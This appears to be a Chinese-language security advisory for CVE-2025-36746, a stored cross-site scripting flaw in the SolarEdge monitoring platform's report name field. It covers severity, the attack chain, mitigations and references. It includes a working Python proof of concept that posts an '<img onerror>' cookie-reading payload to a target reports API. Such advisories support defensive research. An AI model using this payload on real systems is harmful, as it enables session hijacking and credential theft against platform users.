CVE-2025-36746 SolarEdge监控平台存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-36746

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SolarEdge monitoring platform

漏洞概述

SolarEdge监控平台是一款用于太阳能发电系统监控和管理的软件解决方案。该平台存在一个存储型跨站脚本（Stored XSS）漏洞，允许已认证用户在创建或编辑报告时，在报告名称字段中注入恶意JavaScript代码。当其他用户尝试查看或删除这些包含恶意代码的报告时，注入的脚本代码会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。攻击者利用此漏洞可以获取受害者的认证凭证、操纵页面内容或执行未经授权的操作。

技术细节

该漏洞为存储型XSS（Stored XSS），攻击流程如下：1）攻击者以低权限用户身份登录SolarEdge监控平台；2）攻击者在创建或编辑报告时，将恶意JavaScript代码（如<img src=x onerror=alert(document.cookie)>）注入到报告名称字段；3）系统未对用户输入进行充分的HTML实体转义，直接将恶意代码存储到数据库中；4）当受害者（如管理员或其他用户）访问报告列表并尝试删除该报告时，浏览器渲染页面时会执行注入的恶意脚本；5）攻击者可借此窃取受害者的会话Cookie、劫持用户会话或执行其他恶意操作。漏洞的利用条件为：攻击者需要拥有平台账户（低权限即可），且需要诱导受害者进行交互操作（如点击删除按钮）。

攻击链分析

STEP 1

步骤1

攻击者注册并登录SolarEdge监控平台，获取低权限用户账户

STEP 2

步骤2

攻击者创建新报告或在编辑现有报告时，将恶意JavaScript代码注入到报告名称字段

STEP 3

步骤3

系统未对输入进行充分过滤，将恶意代码存储到数据库中

STEP 4

步骤4

受害者（如管理员）登录平台，访问报告列表页面

STEP 5

步骤5

受害者在查看或尝试删除包含恶意代码的报告时，浏览器执行注入的脚本

STEP 6

步骤6

攻击者通过XSS成功窃取受害者Cookie、会话令牌或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# SolarEdge XSS PoC - CVE-2025-36746
# Target: SolarEdge monitoring platform
# Payload: <img src=x onerror=alert(document.cookie)>

TARGET_URL = "https://[target]/api/reports"
SESSION_COOKIE = "your_session_cookie_here"

headers = {
    "Cookie": f"JSESSIONID={SESSION_COOKIE}",
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

# Malicious payload for XSS
xss_payload = '<img src=x onerror=alert(document.cookie)>'

# Create report with XSS payload
data = {
    "reportName": xss_payload,
    "description": "Test Report",
    "type": "performance"
}

try:
    response = requests.post(TARGET_URL, headers=headers, json=data, verify=False)
    if response.status_code == 200 or response.status_code == 201:
        print("[+] XSS payload injected successfully!")
        print(f"[+] Report ID: {response.json().get('id')}")
        print("[+] When victim deletes this report, XSS will execute")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

SolarEdge monitoring platform (特定版本需参考官方公告)

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时措施：1）启用浏览器的XSS过滤器功能；2）对报告名称字段实施输入长度限制和字符白名单过滤；3）监控和审计报告创建操作日志；4）限制低权限用户创建报告的功能；5）提醒用户不要随意点击不明链接或访问可疑报告；6）考虑临时禁用报告删除功能直至漏洞修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36746
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36746
3 Details https://www.cvedetails.com/cve/CVE-2025-36746/
4 VulDB https://vuldb.com/cve/CVE-2025-36746
5 Link https://csirt.divd.nl/CVE-2025-36746
6 Link https://csirt.divd.nl/DIVD-2025-00022/